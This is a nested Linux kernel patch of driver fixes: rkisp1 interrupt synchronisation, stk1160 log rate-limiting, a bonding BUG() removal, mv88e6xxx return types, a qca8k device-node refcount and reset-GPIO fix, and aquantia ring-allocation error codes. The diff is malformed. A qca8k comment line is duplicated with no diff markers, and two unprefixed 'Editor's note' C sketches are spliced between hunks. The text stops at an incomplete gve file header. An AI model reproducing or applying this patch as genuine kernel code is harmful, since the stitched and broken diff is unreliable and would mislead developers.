+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+index a1293c45aae11..f9ec1c6138947 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+@@ -61,6 +61,14 @@ struct dentry;
+ 						 RKISP1_CIF_ISP_EXP_END |	\
+ 						 RKISP1_CIF_ISP_HIST_MEASURE_RDY)
+ 
++/* IRQ lines */
++enum rkisp1_irq_line {
++	RKISP1_IRQ_ISP = 0,
++	RKISP1_IRQ_MI,
++	RKISP1_IRQ_MIPI,
++	RKISP1_NUM_IRQS,
++};
++
+ /* enum for the resizer pads */
+ enum rkisp1_rsz_pad {
+ 	RKISP1_RSZ_PAD_SINK,
+@@ -441,7 +449,6 @@ struct rkisp1_debug {
+  * struct rkisp1_device - ISP platform device
+  *
+  * @base_addr:	   base register address
+- * @irq:	   the irq number
+  * @dev:	   a pointer to the struct device
+  * @clk_size:	   number of clocks
+  * @clks:	   array of clocks
+@@ -459,6 +466,7 @@ struct rkisp1_debug {
+  * @stream_lock:   serializes {start/stop}_streaming callbacks between the capture devices.
+  * @debug:	   debug params to be exposed on debugfs
+  * @info:	   version-specific ISP information
++ * @irqs:          IRQ line numbers
+  */
+ struct rkisp1_device {
+ 	void __iomem *base_addr;
+@@ -479,6 +487,7 @@ struct rkisp1_device {
+ 	struct mutex stream_lock; /* serialize {start/stop}_streaming cb between capture devices */
+ 	struct rkisp1_debug debug;
+ 	const struct rkisp1_info *info;
++	int irqs[RKISP1_NUM_IRQS];
+ };
+ 
+ /*
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+index d7acc94e10f8d..e862f515cc6d3 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+@@ -141,8 +141,20 @@ static void rkisp1_csi_disable(struct rkisp1_csi *csi)
+ 	struct rkisp1_device *rkisp1 = csi->rkisp1;
+ 	u32 val;
+ 
+-	/* Mask and clear interrupts. */
++	/* Mask MIPI interrupts. */
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MIPI_IMSC, 0);
++
++	/* Flush posted writes */
++	rkisp1_read(rkisp1, RKISP1_CIF_MIPI_IMSC);
++
++	/*
++	 * Wait until the IRQ handler has ended. The IRQ handler may get called
++	 * even after this, but it will return immediately as the MIPI
++	 * interrupts have been masked.
++	 */
++	synchronize_irq(rkisp1->irqs[RKISP1_IRQ_MIPI]);
++
++	/* Clear MIPI interrupt status */
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MIPI_ICR, ~0);
+ 
+ 	val = rkisp1_read(rkisp1, RKISP1_CIF_MIPI_CTRL);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index 2b76339f9381c..aeb6bb63667eb 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -114,6 +114,7 @@
+ struct rkisp1_isr_data {
+ 	const char *name;
+ 	irqreturn_t (*isr)(int irq, void *ctx);
++	u32 line_mask;
+ };
+ 
+ /* ----------------------------------------------------------------------------
+@@ -442,17 +443,25 @@ error:
+ 
+ static irqreturn_t rkisp1_isr(int irq, void *ctx)
+ {
++	irqreturn_t ret = IRQ_NONE;
++
+ 	/*
+ 	 * Call rkisp1_capture_isr() first to handle the frame that
+ 	 * potentially completed using the current frame_sequence number before
+ 	 * it is potentially incremented by rkisp1_isp_isr() in the vertical
+ 	 * sync.
+ 	 */
+-	rkisp1_capture_isr(irq, ctx);
+-	rkisp1_isp_isr(irq, ctx);
+-	rkisp1_csi_isr(irq, ctx);
+ 
+-	return IRQ_HANDLED;
++	if (rkisp1_capture_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	if (rkisp1_isp_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	if (rkisp1_csi_isr(irq, ctx) == IRQ_HANDLED)
++		ret = IRQ_HANDLED;
++
++	return ret;
+ }
+ 
+ static const char * const px30_isp_clks[] = {
+@@ -463,9 +472,9 @@ static const char * const px30_isp_clks[] = {
+ };
+ 
+ static const struct rkisp1_isr_data px30_isp_isrs[] = {
+-	{ "isp", rkisp1_isp_isr },
+-	{ "mi", rkisp1_capture_isr },
+-	{ "mipi", rkisp1_csi_isr },
++	{ "isp", rkisp1_isp_isr, BIT(RKISP1_IRQ_ISP) },
++	{ "mi", rkisp1_capture_isr, BIT(RKISP1_IRQ_MI) },
++	{ "mipi", rkisp1_csi_isr, BIT(RKISP1_IRQ_MIPI) },
+ };
+ 
+ static const struct rkisp1_info px30_isp_info = {
+@@ -484,7 +493,7 @@ static const char * const rk3399_isp_clks[] = {
+ };
+ 
+ static const struct rkisp1_isr_data rk3399_isp_isrs[] = {
+-	{ NULL, rkisp1_isr },
++	{ NULL, rkisp1_isr, BIT(RKISP1_IRQ_ISP) | BIT(RKISP1_IRQ_MI) | BIT(RKISP1_IRQ_MIPI) },
+ };
+ 
+ static const struct rkisp1_info rk3399_isp_info = {
+@@ -535,6 +544,9 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 	if (IS_ERR(rkisp1->base_addr))
+ 		return PTR_ERR(rkisp1->base_addr);
+ 
++	for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il)
++		rkisp1->irqs[il] = -1;
++
+ 	for (i = 0; i < info->isr_size; i++) {
+ 		irq = info->isrs[i].name
+ 		    ? platform_get_irq_byname(pdev, info->isrs[i].name)
+@@ -542,7 +554,12 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 		if (irq < 0)
+ 			return irq;
+ 
+-		ret = devm_request_irq(dev, irq, info->isrs[i].isr, IRQF_SHARED,
++		for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il) {
++			if (info->isrs[i].line_mask & BIT(il))
++				rkisp1->irqs[il] = irq;
++		}
++
++		ret = devm_request_irq(dev, irq, info->isrs[i].isr, 0,
+ 				       dev_driver_string(dev), dev);
+ 		if (ret) {
+ 			dev_err(dev, "request irq failed: %d\n", ret);
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+index 585cf3f534692..00dca284c1222 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+@@ -281,11 +281,25 @@ static void rkisp1_isp_stop(struct rkisp1_isp *isp)
+ 	 * ISP(mi) stop in mi frame end -> Stop ISP(mipi) ->
+ 	 * Stop ISP(isp) ->wait for ISP isp off
+ 	 */
+-	/* stop and clear MI and ISP interrupts */
+-	rkisp1_write(rkisp1, RKISP1_CIF_ISP_IMSC, 0);
+-	rkisp1_write(rkisp1, RKISP1_CIF_ISP_ICR, ~0);
+ 
++	/* Mask MI and ISP interrupts */
++	rkisp1_write(rkisp1, RKISP1_CIF_ISP_IMSC, 0);
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MI_IMSC, 0);
++
++	/* Flush posted writes */
++	rkisp1_read(rkisp1, RKISP1_CIF_MI_IMSC);
++
++	/*
++	 * Wait until the IRQ handler has ended. The IRQ handler may get called
++	 * even after this, but it will return immediately as the MI and ISP
++	 * interrupts have been masked.
++	 */
++	synchronize_irq(rkisp1->irqs[RKISP1_IRQ_ISP]);
++	if (rkisp1->irqs[RKISP1_IRQ_ISP] != rkisp1->irqs[RKISP1_IRQ_MI])
++		synchronize_irq(rkisp1->irqs[RKISP1_IRQ_MI]);
++
++	/* Clear MI and ISP interrupt status */
++	rkisp1_write(rkisp1, RKISP1_CIF_ISP_ICR, ~0);
+ 	rkisp1_write(rkisp1, RKISP1_CIF_MI_ICR, ~0);
+ 
+ 	/* stop ISP */
+diff --git a/drivers/media/usb/stk1160/stk1160-video.c b/drivers/media/usb/stk1160/stk1160-video.c
+index 4e966f6bf608d..366f0e4a5dc0d 100644
+--- a/drivers/media/usb/stk1160/stk1160-video.c
++++ b/drivers/media/usb/stk1160/stk1160-video.c
+@@ -107,8 +107,7 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 
+ 	/*
+ 	 * TODO: These stk1160_dbg are very spammy!
+-	 * We should 1) check why we are getting them
+-	 * and 2) add ratelimit.
++	 * We should check why we are getting them.
+ 	 *
+ 	 * UPDATE: One of the reasons (the only one?) for getting these
+ 	 * is incorrect standard (mismatch between expected and configured).
+@@ -151,7 +150,7 @@ void stk1160_copy_video(struct stk1160 *dev, u8 *src, int len)
+ 
+ 	/* Let the bug hunt begin! sanity checks! */
+ 	if (lencopy < 0) {
+-		stk1160_dbg("copy skipped: negative lencopy\n");
++		printk_ratelimited(KERN_DEBUG "copy skipped: negative lencopy\n");
+ 		return;
+ 	}
+ 
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 9da8235cb6900..43cb511fd8ba7 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -1440,6 +1440,7 @@ config MFD_DAVINCI_VOICECODEC
+ 
+ config MFD_TI_AM335X_TSCADC
+ 	tristate "TI ADC / Touch Screen chip support"
++	depends on ARCH_OMAP2PLUS || ARCH_K3 || COMPILE_TEST
+ 	select MFD_CORE
+ 	select REGMAP
+ 	select REGMAP_MMIO
+diff --git a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+index d7daa01fe7ca9..fdec2c30eb165 100644
+--- a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
++++ b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+@@ -151,6 +151,7 @@ static int lis3lv02d_i2c_probe(struct i2c_client *client,
+ 	lis3_dev.init	  = lis3_i2c_init;
+ 	lis3_dev.read	  = lis3_i2c_read;
+ 	lis3_dev.write	  = lis3_i2c_write;
++	lis3_dev.reg_ctrl = lis3_reg_ctrl;
+ 	lis3_dev.irq	  = client->irq;
+ 	lis3_dev.ac	  = lis3lv02d_axis_map;
+ 	lis3_dev.pm_dev	  = &client->dev;
+diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
+index fc5da5d7744da..9c4c2c7d90ef5 100644
+--- a/drivers/net/bonding/bond_alb.c
++++ b/drivers/net/bonding/bond_alb.c
+@@ -985,7 +985,8 @@ static int alb_upper_dev_walk(struct net_device *upper,
+ 	if (netif_is_macvlan(upper) && !strict_match) {
+ 		tags = bond_verify_device_path(bond->dev, upper, 0);
+ 		if (IS_ERR_OR_NULL(tags))
+-			BUG();
++			return -ENOMEM;
++
+ 		alb_send_lp_vid(slave, upper->dev_addr,
+ 				tags[0].vlan_proto, tags[0].vlan_id);
+ 		kfree(tags);
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.h b/drivers/net/dsa/mv88e6xxx/chip.h
+index e693154cf8034..97a47d8743fd3 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.h
++++ b/drivers/net/dsa/mv88e6xxx/chip.h
+@@ -601,8 +601,8 @@ struct mv88e6xxx_ops {
+ 	int (*serdes_get_sset_count)(struct mv88e6xxx_chip *chip, int port);
+ 	int (*serdes_get_strings)(struct mv88e6xxx_chip *chip,  int port,
+ 				  uint8_t *data);
+-	int (*serdes_get_stats)(struct mv88e6xxx_chip *chip,  int port,
+-				uint64_t *data);
++	size_t (*serdes_get_stats)(struct mv88e6xxx_chip *chip, int port,
++				   uint64_t *data);
+ 
+ 	/* SERDES registers for ethtool */
+ 	int (*serdes_get_regs_len)(struct mv88e6xxx_chip *chip,  int port);
+diff --git a/drivers/net/dsa/mv88e6xxx/serdes.c b/drivers/net/dsa/mv88e6xxx/serdes.c
+index d94150d8f3f47..4c38df4982bfe 100644
+--- a/drivers/net/dsa/mv88e6xxx/serdes.c
++++ b/drivers/net/dsa/mv88e6xxx/serdes.c
+@@ -342,8 +342,8 @@ static uint64_t mv88e6352_serdes_get_stat(struct mv88e6xxx_chip *chip,
+ 	return val;
+ }
+ 
+-int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data)
++size_t mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data)
+ {
+ 	struct mv88e6xxx_port *mv88e6xxx_port = &chip->ports[port];
+ 	struct mv88e6352_serdes_hw_stat *stat;
+@@ -352,7 +352,7 @@ int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+ 
+ 	err = mv88e6352_g2_scratch_port_has_serdes(chip, port);
+ 	if (err <= 0)
+-		return err;
++		return 0;
+ 
+ 	BUILD_BUG_ON(ARRAY_SIZE(mv88e6352_serdes_hw_stats) >
+ 		     ARRAY_SIZE(mv88e6xxx_port->serdes_stats));
+@@ -798,8 +798,8 @@ static uint64_t mv88e6390_serdes_get_stat(struct mv88e6xxx_chip *chip, int lane,
+ 	return reg[0] | ((u64)reg[1] << 16) | ((u64)reg[2] << 32);
+ }
+ 
+-int mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data)
++size_t mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data)
+ {
+ 	struct mv88e6390_serdes_hw_stat *stat;
+ 	int lane;
+diff --git a/drivers/net/dsa/mv88e6xxx/serdes.h b/drivers/net/dsa/mv88e6xxx/serdes.h
+index 29bb4e91e2f6b..67369054951fb 100644
+--- a/drivers/net/dsa/mv88e6xxx/serdes.h
++++ b/drivers/net/dsa/mv88e6xxx/serdes.h
+@@ -165,13 +165,13 @@ irqreturn_t mv88e6393x_serdes_irq_status(struct mv88e6xxx_chip *chip, int port,
+ int mv88e6352_serdes_get_sset_count(struct mv88e6xxx_chip *chip, int port);
+ int mv88e6352_serdes_get_strings(struct mv88e6xxx_chip *chip,
+ 				 int port, uint8_t *data);
+-int mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data);
++size_t mv88e6352_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data);
+ int mv88e6390_serdes_get_sset_count(struct mv88e6xxx_chip *chip, int port);
+ int mv88e6390_serdes_get_strings(struct mv88e6xxx_chip *chip,
+ 				 int port, uint8_t *data);
+-int mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
+-			       uint64_t *data);
++size_t mv88e6390_serdes_get_stats(struct mv88e6xxx_chip *chip, int port,
++				  uint64_t *data);
+ 
+ int mv88e6352_serdes_get_regs_len(struct mv88e6xxx_chip *chip, int port);
+ void mv88e6352_serdes_get_regs(struct mv88e6xxx_chip *chip, int port, void *_p);
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 1e94ba1031ece..641692f716f86 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -842,10 +842,15 @@ qca8k_mdio_register(struct qca8k_priv *priv)
+ 	struct dsa_switch *ds = priv->ds;
+ 	struct device_node *mdio;
+ 	struct mii_bus *bus;
++	int err;
++
++	mdio = of_get_child_by_name(priv->dev->of_node, "mdio");
+ 
+ 	bus = devm_mdiobus_alloc(ds->dev);
+-	if (!bus)
+-		return -ENOMEM;
++	if (!bus) {
++		err = -ENOMEM;
++		goto out_put_node;
++	}
+ 
+ 	bus->priv = (void *)priv;
+ 	snprintf(bus->id, MII_BUS_ID_SIZE, "qca8k-%d.%d",
+@@ -855,12 +860,12 @@ qca8k_mdio_register(struct qca8k_priv *priv)
+ 	ds->slave_mii_bus = bus;
+ 
+ 	/* Check if the devicetree declares the port:phy mapping */
+-	mdio = of_get_child_by_name(priv->dev->of_node, "mdio");
+ 	if (of_device_is_available(mdio)) {
+ 		bus->name = "qca8k slave mii";
+ 		bus->read = qca8k_internal_mdio_read;
+ 		bus->write = qca8k_internal_mdio_write;
+-		return devm_of_mdiobus_register(priv->dev, bus, mdio);
++		err = devm_of_mdiobus_register(priv->dev, bus, mdio);
++		goto out_put_node;
+ 	}
+ 
+ 	/* If a mapping can't be found the legacy mapping is used,
+ 	/* If a mapping can't be found, the legacy mapping is used,
+ 	bus->name = "qca8k-legacy slave mii";
+ 	bus->read = qca8k_legacy_mdio_read;
+ 	bus->write = qca8k_legacy_mdio_write;
+-	return devm_mdiobus_register(priv->dev, bus);
++
++	err = devm_mdiobus_register(priv->dev, bus);
++
++out_put_node:
++	of_node_put(mdio);
++
++	return err;
+ }
+ 
+ static int
+@@ -1924,12 +1935,11 @@ qca8k_sw_probe(struct mdio_device *mdiodev)
+ 	priv->info = of_device_get_match_data(priv->dev);
+ 
+ 	priv->reset_gpio = devm_gpiod_get_optional(priv->dev, "reset",
+-						   GPIOD_ASIS);
++						   GPIOD_OUT_HIGH);
+ 	if (IS_ERR(priv->reset_gpio))
+ 		return PTR_ERR(priv->reset_gpio);
+ 
+ 	if (priv->reset_gpio) {
+-		gpiod_set_value_cansleep(priv->reset_gpio, 1);
+ 		/* The active low duration must be greater than 10 ms
+ 		 * and checkpatch.pl wants 20 ms.
+ 		 */
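/*
 * Editor's note: an illustrative, non-kernel sketch of the two fixes in the
 * qca8k hunks above: take the device-node reference once up front and funnel
 * every exit through a single label that drops it (the of_node_put() pattern),
 * and request the GPIO already driven to its reset level (GPIOD_OUT_HIGH)
 * instead of a separate get-then-set. The refcounted "node" below is a
 * stand-in, not the real of_node API.
 */
#include <stdio.h>

struct node { int refs; };

static struct node *node_get(void)   { static struct node n; n.refs++; return &n; }
static void node_put(struct node *n) { if (n) n->refs--; }

static int register_bus(int fail_alloc)
{
	struct node *mdio = node_get();	/* reference taken exactly once */
	int err = 0;

	if (fail_alloc) {
		err = -12;		/* -ENOMEM */
		goto out_put_node;	/* error path still drops the ref */
	}
	/* ... bus setup would go here ... */
out_put_node:
	node_put(mdio);			/* every path releases it */
	return err;
}

int main(void)
{
	printf("ok=%d fail=%d\n", register_bus(0), register_bus(1));
	return 0;
}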
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index 28c9b6f1a54f1..abd4832e4ed21 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -953,8 +953,6 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ {
+ 	struct aq_ptp_s *aq_ptp = aq_nic->aq_ptp;
+ 	unsigned int tx_ring_idx, rx_ring_idx;
+-	struct aq_ring_s *hwts;
+-	struct aq_ring_s *ring;
+ 	int err;
+ 
+ 	if (!aq_ptp)
+@@ -962,29 +960,23 @@ int aq_ptp_ring_alloc(struct aq_nic_s *aq_nic)
+ 
+ 	tx_ring_idx = aq_ptp_ring_idx(aq_nic->aq_nic_cfg.tc_mode);
+ 
+-	ring = aq_ring_tx_alloc(&aq_ptp->ptp_tx, aq_nic,
+-				tx_ring_idx, &aq_nic->aq_nic_cfg);
+-	if (!ring) {
+-		err = -ENOMEM;
++	err = aq_ring_tx_alloc(&aq_ptp->ptp_tx, aq_nic,
++			       tx_ring_idx, &aq_nic->aq_nic_cfg);
++	if (err)
+ 		goto err_exit;
+-	}
+ 
+ 	rx_ring_idx = aq_ptp_ring_idx(aq_nic->aq_nic_cfg.tc_mode);
+ 
+-	ring = aq_ring_rx_alloc(&aq_ptp->ptp_rx, aq_nic,
+-				rx_ring_idx, &aq_nic->aq_nic_cfg);
+-	if (!ring) {
+-		err = -ENOMEM;
++	err = aq_ring_rx_alloc(&aq_ptp->ptp_rx, aq_nic,
++			       rx_ring_idx, &aq_nic->aq_nic_cfg);
++	if (err)
+ 		goto err_exit_ptp_tx;
+-	}
+ 
+-	hwts = aq_ring_hwts_rx_alloc(&aq_ptp->hwts_rx, aq_nic, PTP_HWST_RING_IDX,
+-				     aq_nic->aq_nic_cfg.rxds,
+-				     aq_nic->aq_nic_cfg.aq_hw_caps->rxd_size);
+-	if (!hwts) {
+-		err = -ENOMEM;
++	err = aq_ring_hwts_rx_alloc(&aq_ptp->hwts_rx, aq_nic, PTP_HWST_RING_IDX,
++				    aq_nic->aq_nic_cfg.rxds,
++				    aq_nic->aq_nic_cfg.aq_hw_caps->rxd_size);
++	if (err)
+ 		goto err_exit_ptp_rx;
+-	}
+ 
+ 	err = aq_ptp_skb_ring_init(&aq_ptp->skb_ring, aq_nic->aq_nic_cfg.rxds);
+ 	if (err != 0) {
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 4d9d7d1edb9b3..9c314fe14ab62 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -132,8 +132,8 @@ static int aq_get_rxpages(struct aq_ring_s *self, struct aq_ring_buff_s *rxbuf)
+ 	return 0;
+ }
+ 
+-static struct aq_ring_s *aq_ring_alloc(struct aq_ring_s *self,
+-				       struct aq_nic_s *aq_nic)
++static int aq_ring_alloc(struct aq_ring_s *self,
++			 struct aq_nic_s *aq_nic)
+ {
+ 	int err = 0;
+ 
+@@ -156,46 +156,29 @@ static struct aq_ring_s *aq_ring_alloc(struct aq_ring_s *self,
+ err_exit:
+ 	if (err < 0) {
+ 		aq_ring_free(self);
+-		self = NULL;
+ 	}
+ 
+-	return self;
++	return err;
+ }
+ 
+-struct aq_ring_s *aq_ring_tx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg)
++int aq_ring_tx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg)
+ {
+-	int err = 0;
+-
+ 	self->aq_nic = aq_nic;
+ 	self->idx = idx;
+ 	self->size = aq_nic_cfg->txds;
+ 	self->dx_size = aq_nic_cfg->aq_hw_caps->txd_size;
+ 
+-	self = aq_ring_alloc(self, aq_nic);
+-	if (!self) {
+-		err = -ENOMEM;
+-		goto err_exit;
+-	}
+-
+-err_exit:
+-	if (err < 0) {
+-		aq_ring_free(self);
+-		self = NULL;
+-	}
+-
+-	return self;
++	return aq_ring_alloc(self, aq_nic);
+ }
+ 
+-struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg)
++int aq_ring_rx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg)
+ {
+-	int err = 0;
+-
+ 	self->aq_nic = aq_nic;
+ 	self->idx = idx;
+ 	self->size = aq_nic_cfg->rxds;
+@@ -217,22 +200,10 @@ struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+ 		self->tail_size = 0;
+ 	}
+ 
+-	self = aq_ring_alloc(self, aq_nic);
+-	if (!self) {
+-		err = -ENOMEM;
+-		goto err_exit;
+-	}
+-
+-err_exit:
+-	if (err < 0) {
+-		aq_ring_free(self);
+-		self = NULL;
+-	}
+-
+-	return self;
++	return aq_ring_alloc(self, aq_nic);
+ }
+ 
+-struct aq_ring_s *
++int
+ aq_ring_hwts_rx_alloc(struct aq_ring_s *self, struct aq_nic_s *aq_nic,
+ 		      unsigned int idx, unsigned int size, unsigned int dx_size)
+ {
+@@ -250,10 +221,10 @@ aq_ring_hwts_rx_alloc(struct aq_ring_s *self, struct aq_nic_s *aq_nic,
+ 					   GFP_KERNEL);
+ 	if (!self->dx_ring) {
+ 		aq_ring_free(self);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+-	return self;
++	return 0;
+ }
+ 
+ int aq_ring_init(struct aq_ring_s *self, const enum atl_ring_type ring_type)
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+index 0a6c34438c1d0..52847310740a2 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+@@ -183,14 +183,14 @@ static inline unsigned int aq_ring_avail_dx(struct aq_ring_s *self)
+ 		self->sw_head - self->sw_tail - 1);
+ }
+ 
+-struct aq_ring_s *aq_ring_tx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg);
+-struct aq_ring_s *aq_ring_rx_alloc(struct aq_ring_s *self,
+-				   struct aq_nic_s *aq_nic,
+-				   unsigned int idx,
+-				   struct aq_nic_cfg_s *aq_nic_cfg);
++int aq_ring_tx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg);
++int aq_ring_rx_alloc(struct aq_ring_s *self,
++		     struct aq_nic_s *aq_nic,
++		     unsigned int idx,
++		     struct aq_nic_cfg_s *aq_nic_cfg);
+ 
+ int aq_ring_init(struct aq_ring_s *self, const enum atl_ring_type ring_type);
+ void aq_ring_rx_deinit(struct aq_ring_s *self);
+@@ -207,9 +207,9 @@ int aq_ring_rx_clean(struct aq_ring_s *self,
+ 		     int budget);
+ int aq_ring_rx_fill(struct aq_ring_s *self);
+ 
+-struct aq_ring_s *aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
+-		struct aq_nic_s *aq_nic, unsigned int idx,
+-		unsigned int size, unsigned int dx_size);
++int aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
++			  struct aq_nic_s *aq_nic, unsigned int idx,
++			  unsigned int size, unsigned int dx_size);
+ void aq_ring_hwts_rx_clean(struct aq_ring_s *self, struct aq_nic_s *aq_nic);
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data);
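/*
 * Editor's note: a standalone sketch of the aq_ring conversion above. The
 * ring is embedded in its parent structure, so "allocation" is really
 * initialization; returning int propagates the real error from the failing
 * step instead of collapsing everything to NULL/-ENOMEM, and the old
 * "self = NULL" dance in the callers disappears. Illustrative names only.
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

struct ring { void *buf; size_t size; };

static int ring_alloc(struct ring *self, size_t size)
{
	self->size = size;
	self->buf = malloc(size);
	return self->buf ? 0 : -ENOMEM;	/* error code, not a NULL pointer */
}

int main(void)
{
	struct ring rx;			/* caller owns the storage */
	int err = ring_alloc(&rx, 4096);

	if (err) {
		fprintf(stderr, "ring_alloc: %d\n", err);
		return 1;
	}
	free(rx.buf);
	return 0;
}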
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_vec.c b/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
+index f5db1c44e9b91..9769ab4f9bef0 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_vec.c
+@@ -136,35 +136,32 @@ int aq_vec_ring_alloc(struct aq_vec_s *self, struct aq_nic_s *aq_nic,
+ 		const unsigned int idx_ring = AQ_NIC_CFG_TCVEC2RING(aq_nic_cfg,
+ 								    i, idx);
+ 
+-		ring = aq_ring_tx_alloc(&self->ring[i][AQ_VEC_TX_ID], aq_nic,
+-					idx_ring, aq_nic_cfg);
+-		if (!ring) {
+-			err = -ENOMEM;
++		ring = &self->ring[i][AQ_VEC_TX_ID];
++		err = aq_ring_tx_alloc(ring, aq_nic, idx_ring, aq_nic_cfg);
++		if (err)
+ 			goto err_exit;
+-		}
+ 
+ 		++self->tx_rings;
+ 
+ 		aq_nic_set_tx_ring(aq_nic, idx_ring, ring);
+ 
+-		if (xdp_rxq_info_reg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq,
++		ring = &self->ring[i][AQ_VEC_RX_ID];
++		if (xdp_rxq_info_reg(&ring->xdp_rxq,
+ 				     aq_nic->ndev, idx,
+ 				     self->napi.napi_id) < 0) {
+ 			err = -ENOMEM;
+ 			goto err_exit;
+ 		}
+-		if (xdp_rxq_info_reg_mem_model(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq,
++		if (xdp_rxq_info_reg_mem_model(&ring->xdp_rxq,
+ 					       MEM_TYPE_PAGE_SHARED, NULL) < 0) {
+-			xdp_rxq_info_unreg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq);
++			xdp_rxq_info_unreg(&ring->xdp_rxq);
+ 			err = -ENOMEM;
+ 			goto err_exit;
+ 		}
+ 
+-		ring = aq_ring_rx_alloc(&self->ring[i][AQ_VEC_RX_ID], aq_nic,
+-					idx_ring, aq_nic_cfg);
+-		if (!ring) {
+-			xdp_rxq_info_unreg(&self->ring[i][AQ_VEC_RX_ID].xdp_rxq);
+-			err = -ENOMEM;
++		err = aq_ring_rx_alloc(ring, aq_nic, idx_ring, aq_nic_cfg);
++		if (err) {
++			xdp_rxq_info_unreg(&ring->xdp_rxq);
+ 			goto err_exit;
+ 		}
+ 
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index 588d64819ed5e..e84e944d751d2 100644
